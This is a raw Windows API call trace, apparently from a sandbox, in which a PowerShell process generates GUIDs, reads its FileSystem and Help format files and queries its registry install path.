	[0766.060] CoCreateGuid (in: pguid=0x20d3f0 | out: pguid=0x20d3f0*(Data1=0xeb2f6338, Data2=0xb96e, Data3=0x4a33, Data4=([0]=0x93, [1]=0x7d, [2]=0xd4, [3]=0xdd, [4]=0x4f, [5]=0xcc, [6]=0x5e, [7]=0xdc))) returned 0x0
	[0766.060] CoCreateGuid (in: pguid=0x20d3f0 | out: pguid=0x20d3f0*(Data1=0x5929df1, Data2=0xbcd0, Data3=0x46ff, Data4=([0]=0x9a, [1]=0x8a, [2]=0x54, [3]=0xee, [4]=0x29, [5]=0xed, [6]=0xc4, [7]=0x46))) returned 0x0
	[0766.060] CoCreateGuid (in: pguid=0x20d3f0 | out: pguid=0x20d3f0*(Data1=0xed0c5a29, Data2=0x9778, Data3=0x4c02, Data4=([0]=0xbe, [1]=0x61, [2]=0xcc, [3]=0x6d, [4]=0x7b, [5]=0x31, [6]=0xf6, [7]=0x32))) returned 0x0
	[0766.061] CoCreateGuid (in: pguid=0x20d3f0 | out: pguid=0x20d3f0*(Data1=0x5519eca6, Data2=0x6cc3, Data3=0x475f, Data4=([0]=0xab, [1]=0x8c, [2]=0xf8, [3]=0x2e, [4]=0x83, [5]=0xb4, [6]=0x71, [7]=0xdb))) returned 0x0
	[0766.061] CoCreateGuid (in: pguid=0x20d3f0 | out: pguid=0x20d3f0*(Data1=0x40d21b0b, Data2=0x6e90, Data3=0x4c4d, Data4=([0]=0x94, [1]=0x19, [2]=0xe, [3]=0xeb, [4]=0x8f, [5]=0x81, [6]=0xdb, [7]=0x79))) returned 0x0
	[0766.061] CoCreateGuid (in: pguid=0x20d3f0 | out: pguid=0x20d3f0*(Data1=0x33352f14, Data2=0xa95, Data3=0x4aa1, Data4=([0]=0x8f, [1]=0x78, [2]=0xad, [3]=0x96, [4]=0x5a, [5]=0x6f, [6]=0x47, [7]=0xa9))) returned 0x0
	[0766.061] CoCreateGuid (in: pguid=0x20d3f0 | out: pguid=0x20d3f0*(Data1=0x7a829924, Data2=0xac59, Data3=0x41f0, Data4=([0]=0xa2, [1]=0x1c, [2]=0xc2, [3]=0x24, [4]=0xd6, [5]=0x97, [6]=0x92, [7]=0x8a))) returned 0x0
	[0766.061] CoCreateGuid (in: pguid=0x20d3f0 | out: pguid=0x20d3f0*(Data1=0x44b3d2d, Data2=0xb8d6, Data3=0x48ac, Data4=([0]=0xac, [1]=0xa9, [2]=0x8c, [3]=0x82, [4]=0xdd, [5]=0xd9, [6]=0x35, [7]=0x33))) returned 0x0
	[0766.062] CoCreateGuid (in: pguid=0x20d3f0 | out: pguid=0x20d3f0*(Data1=0xe8c42239, Data2=0xa19, Data3=0x4f6e, Data4=([0]=0xa1, [1]=0xc, [2]=0x3a, [3]=0xb0, [4]=0xff, [5]=0xf, [6]=0x27, [7]=0x9e))) returned 0x0
	[0766.062] CoCreateGuid (in: pguid=0x20d3f0 | out: pguid=0x20d3f0*(Data1=0xef87249, Data2=0x644a, Data3=0x42fd, Data4=([0]=0xad, [1]=0xd0, [2]=0x22, [3]=0x6, [4]=0x1b, [5]=0x13, [6]=0xb0, [7]=0xaf))) returned 0x0
	[0766.062] CoCreateGuid (in: pguid=0x20d3f0 | out: pguid=0x20d3f0*(Data1=0xa435d6d, Data2=0x2f9c, Data3=0x495d, Data4=([0]=0xa4, [1]=0x42, [2]=0x52, [3]=0xb4, [4]=0xca, [5]=0x7c, [6]=0x6d, [7]=0x9))) returned 0x0
	[0766.063] CoCreateGuid (in: pguid=0x20d3f0 | out: pguid=0x20d3f0*(Data1=0x9824288a, Data2=0x5223, Data3=0x4f74, Data4=([0]=0x91, [1]=0x63, [2]=0xe0, [3]=0x58, [4]=0x7b, [5]=0xe, [6]=0x6f, [7]=0xb8))) returned 0x0
	[0766.064] CoCreateGuid (in: pguid=0x20d3f0 | out: pguid=0x20d3f0*(Data1=0x90b5c28b, Data2=0x4fdc, Data3=0x42f0, Data4=([0]=0x82, [1]=0xd1, [2]=0x83, [3]=0xaa, [4]=0xe4, [5]=0xfd, [6]=0x95, [7]=0xab))) returned 0x0
	[0766.065] CoCreateGuid (in: pguid=0x20d3f0 | out: pguid=0x20d3f0*(Data1=0x61406872, Data2=0xfa4e, Data3=0x4587, Data4=([0]=0xa3, [1]=0x51, [2]=0xa9, [3]=0x32, [4]=0xea, [5]=0xd0, [6]=0xaa, [7]=0xe6))) returned 0x0
	[0766.065] CoCreateGuid (in: pguid=0x20d3f0 | out: pguid=0x20d3f0*(Data1=0xaf95be7b, Data2=0x99f2, Data3=0x49bf, Data4=([0]=0x85, [1]=0x60, [2]=0x22, [3]=0x47, [4]=0xbc, [5]=0x2b, [6]=0x73, [7]=0x50))) returned 0x0
	[0766.065] CoCreateGuid (in: pguid=0x20d3f0 | out: pguid=0x20d3f0*(Data1=0x3dca6708, Data2=0x1393, Data3=0x4125, Data4=([0]=0x8a, [1]=0x7d, [2]=0x3, [3]=0xaf, [4]=0x4d, [5]=0x80, [6]=0x2, [7]=0x30))) returned 0x0
	[0766.066] CoCreateGuid (in: pguid=0x20d3f0 | out: pguid=0x20d3f0*(Data1=0xe4cbf445, Data2=0x6d54, Data3=0x46fd, Data4=([0]=0x8f, [1]=0xa9, [2]=0xc9, [3]=0x0, [4]=0x4f, [5]=0xe5, [6]=0x51, [7]=0xe5))) returned 0x0
	[0766.066] CoCreateGuid (in: pguid=0x20d3f0 | out: pguid=0x20d3f0*(Data1=0x731bdb03, Data2=0xb5a1, Data3=0x4df6, Data4=([0]=0x9a, [1]=0x79, [2]=0xed, [3]=0x29, [4]=0x45, [5]=0x5e, [6]=0x8d, [7]=0xa7))) returned 0x0
	[0766.066] CoCreateGuid (in: pguid=0x20d3f0 | out: pguid=0x20d3f0*(Data1=0x9db65bea, Data2=0x68ac, Data3=0x4e61, Data4=([0]=0xaa, [1]=0x7c, [2]=0xc3, [3]=0x6e, [4]=0xb, [5]=0xb, [6]=0x12, [7]=0xc6))) returned 0x0
	[0766.067] CoCreateGuid (in: pguid=0x20d3f0 | out: pguid=0x20d3f0*(Data1=0xf729a581, Data2=0xb1f4, Data3=0x483b, Data4=([0]=0x8a, [1]=0x63, [2]=0xbe, [3]=0x27, [4]=0xee, [5]=0x8b, [6]=0xa5, [7]=0x45))) returned 0x0
	[0766.067] CoCreateGuid (in: pguid=0x20d3f0 | out: pguid=0x20d3f0*(Data1=0xa1b80331, Data2=0x7e24, Data3=0x41db, Data4=([0]=0xa7, [1]=0x30, [2]=0x5b, [3]=0xb6, [4]=0x43, [5]=0x70, [6]=0xc, [7]=0x5b))) returned 0x0
	[0766.067] CoCreateGuid (in: pguid=0x20d3f0 | out: pguid=0x20d3f0*(Data1=0x6f6da23a, Data2=0x9896, Data3=0x486b, Data4=([0]=0x8e, [1]=0x4f, [2]=0xb2, [3]=0xc6, [4]=0x93, [5]=0xef, [6]=0x40, [7]=0xa3))) returned 0x0
	[0766.068] CoCreateGuid (in: pguid=0x20d3f0 | out: pguid=0x20d3f0*(Data1=0x6b51a321, Data2=0xa1e7, Data3=0x47ed, Data4=([0]=0x87, [1]=0x2, [2]=0xa8, [3]=0xc9, [4]=0xdf, [5]=0x8b, [6]=0xb4, [7]=0x9e))) returned 0x0
	[0766.068] CoCreateGuid (in: pguid=0x20d3f0 | out: pguid=0x20d3f0*(Data1=0x8de40880, Data2=0x777, Data3=0x4081, Data4=([0]=0x88, [1]=0x12, [2]=0xad, [3]=0xef, [4]=0x65, [5]=0x99, [6]=0x3b, [7]=0x1))) returned 0x0
	[0766.068] CoCreateGuid (in: pguid=0x20d3f0 | out: pguid=0x20d3f0*(Data1=0xf1905731, Data2=0x859e, Data3=0x4009, Data4=([0]=0xaf, [1]=0x1, [2]=0x3c, [3]=0xf4, [4]=0x5a, [5]=0x8f, [6]=0xf1, [7]=0xc6))) returned 0x0
	[0766.069] CoCreateGuid (in: pguid=0x20d3f0 | out: pguid=0x20d3f0*(Data1=0x75f28d8d, Data2=0xa29a, Data3=0x4e11, Data4=([0]=0x88, [1]=0x6e, [2]=0xd6, [3]=0x85, [4]=0x76, [5]=0xb, [6]=0x93, [7]=0x3e))) returned 0x0
	[0766.069] CoCreateGuid (in: pguid=0x20d3f0 | out: pguid=0x20d3f0*(Data1=0x4f25916d, Data2=0xca26, Data3=0x47a3, Data4=([0]=0x86, [1]=0x8c, [2]=0x11, [3]=0xc0, [4]=0xb7, [5]=0xb2, [6]=0x39, [7]=0xbd))) returned 0x0
	[0766.069] CoCreateGuid (in: pguid=0x20d3f0 | out: pguid=0x20d3f0*(Data1=0xdf98bd5f, Data2=0x57ae, Data3=0x4054, Data4=([0]=0xa0, [1]=0x15, [2]=0xf7, [3]=0x69, [4]=0x5d, [5]=0x98, [6]=0xf9, [7]=0xe9))) returned 0x0
	[0766.069] CoCreateGuid (in: pguid=0x20d3f0 | out: pguid=0x20d3f0*(Data1=0xa8352086, Data2=0xe008, Data3=0x474f, Data4=([0]=0x89, [1]=0xcc, [2]=0x62, [3]=0x92, [4]=0x32, [5]=0x6, [6]=0x18, [7]=0xbf))) returned 0x0
	[0766.070] CoCreateGuid (in: pguid=0x20d3f0 | out: pguid=0x20d3f0*(Data1=0x263e6aa, Data2=0xd926, Data3=0x4b1e, Data4=([0]=0xb3, [1]=0x55, [2]=0x2c, [3]=0x27, [4]=0xda, [5]=0xbe, [6]=0x58, [7]=0x7f))) returned 0x0
	[0766.070] CoCreateGuid (in: pguid=0x20d3f0 | out: pguid=0x20d3f0*(Data1=0xd734a28, Data2=0x4b8d, Data3=0x4f30, Data4=([0]=0x94, [1]=0x34, [2]=0x41, [3]=0x45, [4]=0x67, [5]=0x24, [6]=0x62, [7]=0x52))) returned 0x0
	[0768.031] CoCreateGuid (in: pguid=0x20d3f0 | out: pguid=0x20d3f0*(Data1=0x866a53ae, Data2=0x224a, Data3=0x41e9, Data4=([0]=0xa4, [1]=0x91, [2]=0x68, [3]=0x69, [4]=0xe, [5]=0x95, [6]=0x8c, [7]=0x92))) returned 0x0
	[0768.035] CoCreateGuid (in: pguid=0x20d3f0 | out: pguid=0x20d3f0*(Data1=0x42644e2d, Data2=0xe3b0, Data3=0x4879, Data4=([0]=0x98, [1]=0xae, [2]=0x3d, [3]=0xe1, [4]=0x8e, [5]=0xee, [6]=0x18, [7]=0x3f))) returned 0x0
	[0768.036] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x310
	[0768.036] GetFileType (hFile=0x310) returned 0x1
	[0768.036] SetErrorMode (uMode=0x1) returned 0x1
	[0768.036] GetFileType (hFile=0x310) returned 0x1
	[0768.036] ReadFile (in: hFile=0x310, lpBuffer=0x3391910, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d138, lpOverlapped=0x0 | out: lpBuffer=0x3391910*, lpNumberOfBytesRead=0x20d138*=0x1000, lpOverlapped=0x0) returned 1
	[0768.043] ReadFile (in: hFile=0x310, lpBuffer=0x31cc500, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d138, lpOverlapped=0x0 | out: lpBuffer=0x31cc500*, lpNumberOfBytesRead=0x20d138*=0x1000, lpOverlapped=0x0) returned 1
	[0768.043] ReadFile (in: hFile=0x310, lpBuffer=0x31cc500, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d138, lpOverlapped=0x0 | out: lpBuffer=0x31cc500*, lpNumberOfBytesRead=0x20d138*=0x1000, lpOverlapped=0x0) returned 1
	[0768.043] ReadFile (in: hFile=0x310, lpBuffer=0x31cc500, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d138, lpOverlapped=0x0 | out: lpBuffer=0x31cc500*, lpNumberOfBytesRead=0x20d138*=0x1000, lpOverlapped=0x0) returned 1
	[0768.043] ReadFile (in: hFile=0x310, lpBuffer=0x31cc500, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d138, lpOverlapped=0x0 | out: lpBuffer=0x31cc500*, lpNumberOfBytesRead=0x20d138*=0x1000, lpOverlapped=0x0) returned 1
	[0768.044] ReadFile (in: hFile=0x310, lpBuffer=0x31cc500, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d138, lpOverlapped=0x0 | out: lpBuffer=0x31cc500*, lpNumberOfBytesRead=0x20d138*=0x1000, lpOverlapped=0x0) returned 1
	[0768.044] ReadFile (in: hFile=0x310, lpBuffer=0x31cc500, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d138, lpOverlapped=0x0 | out: lpBuffer=0x31cc500*, lpNumberOfBytesRead=0x20d138*=0x119, lpOverlapped=0x0) returned 1
	[0768.044] ReadFile (in: hFile=0x310, lpBuffer=0x31cc500, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d138, lpOverlapped=0x0 | out: lpBuffer=0x31cc500*, lpNumberOfBytesRead=0x20d138*=0x0, lpOverlapped=0x0) returned 1
	[0768.044] CloseHandle (hObject=0x310) returned 1
	[0768.044] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x20ce80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0768.044] SetErrorMode (uMode=0x1) returned 0x1
	[0768.044] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x20d0e0 | out: lpFileInformation=0x20d0e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e2b98c, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e2b98c, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e76251, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6119)) returned 1
	[0768.045] SetErrorMode (uMode=0x1) returned 0x1
	[0768.045] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x20ce10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0768.045] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x20d1c8 | out: phkResult=0x20d1c8*=0x310) returned 0x0
	[0768.045] RegQueryValueExW (in: hKey=0x310, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x20d14c, lpData=0x0, lpcbData=0x20d148*=0x0 | out: lpType=0x20d14c*=0x1, lpData=0x0, lpcbData=0x20d148*=0x56) returned 0x0
	[0768.045] CoTaskMemAlloc (cb=0x5a) returned 0x1b8560b0
	[0768.045] RegQueryValueExW (in: hKey=0x310, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x20d11c, lpData=0x1b8560b0, lpcbData=0x20d118*=0x56 | out: lpType=0x20d11c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x20d118*=0x56) returned 0x0
	[0768.045] CoTaskMemFree (pv=0x1b8560b0) 
	[0768.045] RegCloseKey (hKey=0x310) returned 0x0
	[0768.046] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x20ce10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0768.046] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x20ccc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0768.046] CoCreateGuid (in: pguid=0x20d3f0 | out: pguid=0x20d3f0*(Data1=0x8c09cc5b, Data2=0xfbd1, Data3=0x4bd6, Data4=([0]=0x8b, [1]=0x34, [2]=0x84, [3]=0xf0, [4]=0xa8, [5]=0xc7, [6]=0x8a, [7]=0xce))) returned 0x0
	[0768.047] CoCreateGuid (in: pguid=0x20d3f0 | out: pguid=0x20d3f0*(Data1=0x57e7deb, Data2=0xc10e, Data3=0x4b13, Data4=([0]=0x89, [1]=0x45, [2]=0xba, [3]=0x70, [4]=0x8a, [5]=0x54, [6]=0x1b, [7]=0x96))) returned 0x0
	[0768.047] CoCreateGuid (in: pguid=0x20d3f0 | out: pguid=0x20d3f0*(Data1=0x91f109b2, Data2=0xa924, Data3=0x468a, Data4=([0]=0xa8, [1]=0xfa, [2]=0x31, [3]=0x63, [4]=0x17, [5]=0xa, [6]=0x79, [7]=0x73))) returned 0x0
	[0768.047] CoCreateGuid (in: pguid=0x20d3f0 | out: pguid=0x20d3f0*(Data1=0x78ddcb1c, Data2=0xdead, Data3=0x4bea, Data4=([0]=0xb6, [1]=0x53, [2]=0xdc, [3]=0xf1, [4]=0x86, [5]=0x42, [6]=0x80, [7]=0x19))) returned 0x0
	[0768.047] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\help.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x310
	[0768.047] GetFileType (hFile=0x310) returned 0x1
	[0768.047] SetErrorMode (uMode=0x1) returned 0x1
	[0768.047] GetFileType (hFile=0x310) returned 0x1
	[0768.048] ReadFile (in: hFile=0x310, lpBuffer=0x3228b60, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d138, lpOverlapped=0x0 | out: lpBuffer=0x3228b60*, lpNumberOfBytesRead=0x20d138*=0x1000, lpOverlapped=0x0) returned 1
	[0768.048] ReadFile (in: hFile=0x310, lpBuffer=0x3228b60, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d138, lpOverlapped=0x0 | out: lpBuffer=0x3228b60*, lpNumberOfBytesRead=0x20d138*=0x1000, lpOverlapped=0x0) returned 1
	[0768.048] ReadFile (in: hFile=0x310, lpBuffer=0x3228b60, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d138, lpOverlapped=0x0 | out: lpBuffer=0x3228b60*, lpNumberOfBytesRead=0x20d138*=0x1000, lpOverlapped=0x0) returned 1
	[0768.048] ReadFile (in: hFile=0x310, lpBuffer=0x3228b60, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d138, lpOverlapped=0x0 | out: lpBuffer=0x3228b60*, lpNumberOfBytesRead=0x20d138*=0x1000, lpOverlapped=0x0) returned 1
	[0768.048] ReadFile (in: hFile=0x310, lpBuffer=0x3228b60, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d138, lpOverlapped=0x0 | out: lpBuffer=0x3228b60*, lpNumberOfBytesRead=0x20d138*=0x1000, lpOverlapped=0x0) returned 1
	[0768.048] ReadFile (in: hFile=0x310, lpBuffer=0x3228b60, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d138, lpOverlapped=0x0 | out: lpBuffer=0x3228b60*, lpNumberOfBytesRead=0x20d138*=0x1000, lpOverlapped=0x0) returned 1
	[0768.049] ReadFile (in: hFile=0x310, lpBuffer=0x3228b60, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d138, lpOverlapped=0x0 | out: lpBuffer=0x3228b60*, lpNumberOfBytesRead=0x20d138*=0x1000, lpOverlapped=0x0) returned 1
	[0768.049] ReadFile (in: hFile=0x310, lpBuffer=0x3228b60, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d138, lpOverlapped=0x0 | out: lpBuffer=0x3228b60*, lpNumberOfBytesRead=0x20d138*=0x1000, lpOverlapped=0x0) returned 1
	[0768.051] ReadFile (in: hFile=0x310, lpBuffer=0x3228b60, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d138, lpOverlapped=0x0 | out: lpBuffer=0x3228b60*, lpNumberOfBytesRead=0x20d138*=0x1000, lpOverlapped=0x0) returned 1
	[0768.051] ReadFile (in: hFile=0x310, lpBuffer=0x3228b60, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d138, lpOverlapped=0x0 | out: lpBuffer=0x3228b60*, lpNumberOfBytesRead=0x20d138*=0x1000, lpOverlapped=0x0) returned 1
	[0768.052] ReadFile (in: hFile=0x310, lpBuffer=0x3228b60, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d138, lpOverlapped=0x0 | out: lpBuffer=0x3228b60*, lpNumberOfBytesRead=0x20d138*=0x1000, lpOverlapped=0x0) returned 1
	[0768.052] ReadFile (in: hFile=0x310, lpBuffer=0x3228b60, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d138, lpOverlapped=0x0 | out: lpBuffer=0x3228b60*, lpNumberOfBytesRead=0x20d138*=0x1000, lpOverlapped=0x0) returned 1
	[0768.052] ReadFile (in: hFile=0x310, lpBuffer=0x3228b60, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d138, lpOverlapped=0x0 | out: lpBuffer=0x3228b60*, lpNumberOfBytesRead=0x20d138*=0x1000, lpOverlapped=0x0) returned 1
	[0768.053] ReadFile (in: hFile=0x310, lpBuffer=0x3228b60, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d138, lpOverlapped=0x0 | out: lpBuffer=0x3228b60*, lpNumberOfBytesRead=0x20d138*=0x1000, lpOverlapped=0x0) returned 1
	[0768.053] ReadFile (in: hFile=0x310, lpBuffer=0x3228b60, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d138, lpOverlapped=0x0 | out: lpBuffer=0x3228b60*, lpNumberOfBytesRead=0x20d138*=0x1000, lpOverlapped=0x0) returned 1
	[0768.054] ReadFile (in: hFile=0x310, lpBuffer=0x3228b60, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d138, lpOverlapped=0x0 | out: lpBuffer=0x3228b60*, lpNumberOfBytesRead=0x20d138*=0x1000, lpOverlapped=0x0) returned 1
	[0768.057] ReadFile (in: hFile=0x310, lpBuffer=0x3228b60, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d138, lpOverlapped=0x0 | out: lpBuffer=0x3228b60*, lpNumberOfBytesRead=0x20d138*=0x1000, lpOverlapped=0x0) returned 1
	[0768.057] ReadFile (in: hFile=0x310, lpBuffer=0x3228b60, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d138, lpOverlapped=0x0 | out: lpBuffer=0x3228b60*, lpNumberOfBytesRead=0x20d138*=0x1000, lpOverlapped=0x0) returned 1
	[0768.058] ReadFile (in: hFile=0x310, lpBuffer=0x3228b60, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d138, lpOverlapped=0x0 | out: lpBuffer=0x3228b60*, lpNumberOfBytesRead=0x20d138*=0x1000, lpOverlapped=0x0) returned 1
	[0768.058] ReadFile (in: hFile=0x310, lpBuffer=0x3228b60, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d138, lpOverlapped=0x0 | out: lpBuffer=0x3228b60*, lpNumberOfBytesRead=0x20d138*=0x1000, lpOverlapped=0x0) returned 1
	[0768.058] ReadFile (in: hFile=0x310, lpBuffer=0x3228b60, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d138, lpOverlapped=0x0 | out: lpBuffer=0x3228b60*, lpNumberOfBytesRead=0x20d138*=0x1000, lpOverlapped=0x0) returned 1
	[0768.059] ReadFile (in: hFile=0x310, lpBuffer=0x3228b60, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d138, lpOverlapped=0x0 | out: lpBuffer=0x3228b60*, lpNumberOfBytesRead=0x20d138*=0x1000, lpOverlapped=0x0) returned 1
	[0768.059] ReadFile (in: hFile=0x310, lpBuffer=0x3228b60, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d138, lpOverlapped=0x0 | out: lpBuffer=0x3228b60*, lpNumberOfBytesRead=0x20d138*=0x1000, lpOverlapped=0x0) returned 1
	[0768.060] ReadFile (in: hFile=0x310, lpBuffer=0x3228b60, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d138, lpOverlapped=0x0 | out: lpBuffer=0x3228b60*, lpNumberOfBytesRead=0x20d138*=0x1000, lpOverlapped=0x0) returned 1
	[0768.060] ReadFile (in: hFile=0x310, lpBuffer=0x3228b60, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d138, lpOverlapped=0x0 | out: lpBuffer=0x3228b60*, lpNumberOfBytesRead=0x20d138*=0x1000, lpOverlapped=0x0) returned 1
	[0768.060] ReadFile (in: hFile=0x310, lpBuffer=0x3228b60, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d138, lpOverlapped=0x0 | out: lpBuffer=0x3228b60*, lpNumberOfBytesRead=0x20d138*=0x1000, lpOverlapped=0x0) returned 1
	[0768.061] ReadFile (in: hFile=0x310, lpBuffer=0x3228b60, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d138, lpOverlapped=0x0 | out: lpBuffer=0x3228b60*, lpNumberOfBytesRead=0x20d138*=0x1000, lpOverlapped=0x0) returned 1
	[0768.061] ReadFile (in: hFile=0x310, lpBuffer=0x3228b60, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d138, lpOverlapped=0x0 | out: lpBuffer=0x3228b60*, lpNumberOfBytesRead=0x20d138*=0x1000, lpOverlapped=0x0) returned 1
	[0768.061] ReadFile (in: hFile=0x310, lpBuffer=0x3228b60, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d138, lpOverlapped=0x0 | out: lpBuffer=0x3228b60*, lpNumberOfBytesRead=0x20d138*=0x1000, lpOverlapped=0x0) returned 1
	[0768.062] ReadFile (in: hFile=0x310, lpBuffer=0x3228b60, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d138, lpOverlapped=0x0 | out: lpBuffer=0x3228b60*, lpNumberOfBytesRead=0x20d138*=0x1000, lpOverlapped=0x0) returned 1
	[0768.062] ReadFile (in: hFile=0x310, lpBuffer=0x3228b60, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d138, lpOverlapped=0x0 | out: lpBuffer=0x3228b60*, lpNumberOfBytesRead=0x20d138*=0x1000, lpOverlapped=0x0) returned 1
	[0768.062] ReadFile (in: hFile=0x310, lpBuffer=0x3228b60, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d138, lpOverlapped=0x0 | out: lpBuffer=0x3228b60*, lpNumberOfBytesRead=0x20d138*=0x1000, lpOverlapped=0x0) returned 1
	[0769.371] ReadFile (in: hFile=0x310, lpBuffer=0x3228b60, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d138, lpOverlapped=0x0 | out: lpBuffer=0x3228b60*, lpNumberOfBytesRead=0x20d138*=0x1000, lpOverlapped=0x0) returned 1
	[0769.372] ReadFile (in: hFile=0x310, lpBuffer=0x3228b60, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d138, lpOverlapped=0x0 | out: lpBuffer=0x3228b60*, lpNumberOfBytesRead=0x20d138*=0x1000, lpOverlapped=0x0) returned 1
	[0769.372] ReadFile (in: hFile=0x310, lpBuffer=0x3228b60, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d138, lpOverlapped=0x0 | out: lpBuffer=0x3228b60*, lpNumberOfBytesRead=0x20d138*=0x1000, lpOverlapped=0x0) returned 1
	[0769.373] ReadFile (in: hFile=0x310, lpBuffer=0x3228b60, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d138, lpOverlapped=0x0 | out: lpBuffer=0x3228b60*, lpNumberOfBytesRead=0x20d138*=0x1000, lpOverlapped=0x0) returned 1
	[0769.373] ReadFile (in: hFile=0x310, lpBuffer=0x3228b60, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d138, lpOverlapped=0x0 | out: lpBuffer=0x3228b60*, lpNumberOfBytesRead=0x20d138*=0x1000, lpOverlapped=0x0) returned 1
	[0769.373] ReadFile (in: hFile=0x310, lpBuffer=0x3228b60, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d138, lpOverlapped=0x0 | out: lpBuffer=0x3228b60*, lpNumberOfBytesRead=0x20d138*=0x1000, lpOverlapped=0x0) returned 1
	[0769.374] ReadFile (in: hFile=0x310, lpBuffer=0x3228b60, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d138, lpOverlapped=0x0 | out: lpBuffer=0x3228b60*, lpNumberOfBytesRead=0x20d138*=0x1000, lpOverlapped=0x0) returned 1
